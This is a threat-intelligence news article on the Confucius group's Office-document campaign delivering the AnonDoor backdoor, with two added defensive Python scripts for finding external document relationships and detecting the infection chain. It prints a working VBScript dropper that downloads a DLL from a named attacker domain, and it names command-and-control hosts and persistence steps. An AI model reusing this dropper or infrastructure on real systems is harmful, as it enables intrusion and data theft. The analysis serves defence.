The Confucius hacker group, active since 2013, has recently escalated its operations by weaponizing malicious Office documents to compromise Windows endpoints with a new Python-based backdoor, dubbed AnonDoor.
Historically known for deploying document stealers such as WooperStealer, the threat actor has now shifted to a sophisticated multi-stage infection chain that leverages OLE-embedded scripts, VBScript droppers, PowerShell loaders, and scheduled tasks to achieve persistence and evade detection.
This evolution underscores the group’s commitment to refining its tradecraft and targeting high-value information across government and defense organizations in South Asia.
Confucius’ activities (Source – Fortinet)
Initial access is most commonly achieved through spear-phishing campaigns that deliver corrupted PPSX or DOCX attachments.
When unsuspecting users open these documents, they encounter a “Corrupted Page” prompt that conceals an embedded OLE object.
This object triggers a background fetch of a secondary document, mango44NX.doc, from a remote server.
Fortinet researchers noted that the CMD stub within slide1.xml.rels initiates a VBScript dropper hosted at greenxeonsr.info, marking the first deployment of AnonDoor in this campaign.
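The initial-access stage described above hinges on an OOXML relationship part (slide1.xml.rels) that points outside the document. A triage step a defender can automate is to open the attachment as the zip container it is and list every relationship whose target is external or a URL. The script below is an added example and is not Fortinet's or the article's code; the embedded PPSX is a constructed minimal sample whose external target reuses the domain and document name reported on the page, and the relationship layout is an assumption made for illustration, not a reproduction of the real lure.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
URL_LIKE = re.compile(r"(?i)^(https?|ftp|file)://|^\\\\")


def build_sample_ppsx() -> bytes:
    """Constructed sample: a minimal PPSX-like package whose slide1.xml.rels
    carries one normal internal relationship and one external relationship
    pointing at a remote host (values modelled on the page's indicators)."""
    rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout"
    Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
    Target="https://greenxeonsr.info/mango44NX.doc" TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


def find_external_relationships(data: bytes) -> list[dict]:
    """Walk every *.rels part in an OOXML package and report relationships
    that leave the package: TargetMode="External", or a URL/UNC-style target
    even when the mode attribute is missing."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                mode = rel.get("TargetMode", "Internal")
                if mode == "External" or URL_LIKE.search(target):
                    findings.append({
                        "part": name,
                        "id": rel.get("Id", ""),
                        # last path segment of the Type URI, e.g. "oleObject"
                        "kind": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                    })
    return findings


if __name__ == "__main__":
    for hit in find_external_relationships(build_sample_ppsx()):
        print(f"{hit['part']}: {hit['kind']} {hit['id']} -> {hit['target']}")
```

Run against a real attachment by replacing the sample bytes with the file contents; an oleObject or hyperlink relationship whose target is an http(s) URL in a document that arrived by e-mail is worth quarantining before it is opened.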
Upon execution, the VBScript dropper performs the following steps: it creates an MSXML2.XMLHTTP object to download a raw DLL payload, writes the binary to %LocalAppData%\Mapistub.dll, and then stages execution via DLL side-loading.
The dropper also copies a legitimate executable to %AppData%\Swom.exe and writes a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to ensure the side-loaded DLL is launched on each login.
Download DLL (Source – Fortinet)
This strategy not only conceals the malicious binary within trusted processes but also provides robust persistence without generating conspicuous artifacts.
Infection Mechanism
The infection mechanism centers on leveraging a malicious Office payload to seamlessly introduce AnonDoor.
First, the document’s OLE object references an external VBScript hosted on greenxeonsr.info.
The script snippet below illustrates how the dropper leverages ADODB.Stream to save the downloaded bytes as a DLL:
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.Open "GET", "https://greenxeonsr.info/Jsdfwejhrg.rko", False
objXMLHTTP.Send
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1 ' Binary
objStream.Open
objStream.Write objXMLHTTP.responseBody
objStream.SaveToFile WScript.Network.UserName & "Mapistub.dll", 2
objStream.Close
Once the DLL is in place, the dropper invokes a reconstructed ShellExecute call to launch Swom.exe, which side-loads the DLL into memory.
The DLL subsequently reaches out to multiple C2 domains—cornfieldblue.info and hauntedfishtree.info—to retrieve further payloads, including the WooperStealer module and additional configuration files.
This multi-layered approach ensures that even if one stage is detected, subsequent payloads can be dynamically fetched, analyzed, and replaced, complicating forensic investigations.
By chaining document-based exploitation with obfuscated scripting and DLL side-loading, Confucius demonstrates advanced operational security and resilience against endpoint defenses.
Defensive teams should prioritize monitoring for anomalous OLE object behaviour, unexpected registry modifications, and unusual DLL loads within Office processes.
Integrating heuristics that detect atypical stream writes to user directories and enforcing strict network segmentation can help mitigate this emerging threat.
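The detection guidance above (Office processes spawning interpreters, script hosts writing DLLs into user directories, Run-key values pointing into the user profile, and DLLs loaded from those directories) can be expressed as a handful of host-telemetry rules. The script below is an added example, not code from the article or from Fortinet. The event records are constructed and use Sysmon-style field names that are an assumption for this example; the file names and registry key mirror those reported on the page, while user names and full paths are invented.

```python
import re

# Constructed telemetry approximating the chain described on the page.
# Field names (type, image, parent_image, target, key, data, loaded, signed)
# are an assumption; map them onto your own EDR/Sysmon schema.
SAMPLE_EVENTS = [
    {"type": "process_create",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "process_create",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"},
    {"type": "process_create",
     "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"type": "file_create",
     "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\alice\AppData\Local\Mapistub.dll"},
    {"type": "registry_set",
     "image": r"C:\Windows\System32\wscript.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Swom",
     "data": r"C:\Users\alice\AppData\Roaming\Swom.exe"},
    {"type": "image_load",
     "image": r"C:\Users\alice\AppData\Roaming\Swom.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Mapistub.dll",
     "signed": False},
    # Benign noise: Office saving a deck to Documents must not alert.
    {"type": "file_create",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "target": r"C:\Users\alice\Documents\deck.pptx"},
]

OFFICE = re.compile(r"\\(winword|excel|powerpnt)\.exe$", re.I)
INTERPRETERS = re.compile(r"\\(cmd|wscript|cscript|powershell|mshta)\.exe$", re.I)
# Any path under a user's AppData tree (user-writable, outside Program Files).
USER_PROFILE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)


def detect(events):
    """Apply four rules to a list of event dicts and return (rule, subject)
    tuples in event order. Each rule maps to one step of the chain described
    on the page."""
    alerts = []
    for ev in events:
        t = ev["type"]
        if (t == "process_create"
                and OFFICE.search(ev["parent_image"])
                and INTERPRETERS.search(ev["image"])):
            alerts.append(("office_spawns_interpreter", ev["image"]))
        elif (t == "file_create"
                and INTERPRETERS.search(ev["image"])
                and ev["target"].lower().endswith(".dll")
                and USER_PROFILE.match(ev["target"])):
            alerts.append(("script_host_writes_dll_to_profile", ev["target"]))
        elif (t == "registry_set"
                and RUN_KEY.search(ev["key"])
                and USER_PROFILE.match(ev["data"])):
            alerts.append(("run_key_points_to_profile", ev["data"]))
        elif (t == "image_load"
                and USER_PROFILE.match(ev["loaded"])
                and not ev.get("signed", True)):
            alerts.append(("unsigned_dll_from_profile", ev["loaded"]))
    return alerts


if __name__ == "__main__":
    for rule, subject in detect(SAMPLE_EVENTS):
        print(f"{rule}: {subject}")
```

Each rule is deliberately generic: none of them keys on the specific file names from this campaign, so renamed payloads still trip them, and the benign Office save in the sample shows the interpreter and profile-path conditions keep ordinary document activity out of the alert stream.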
Source: cybersecuritynews.com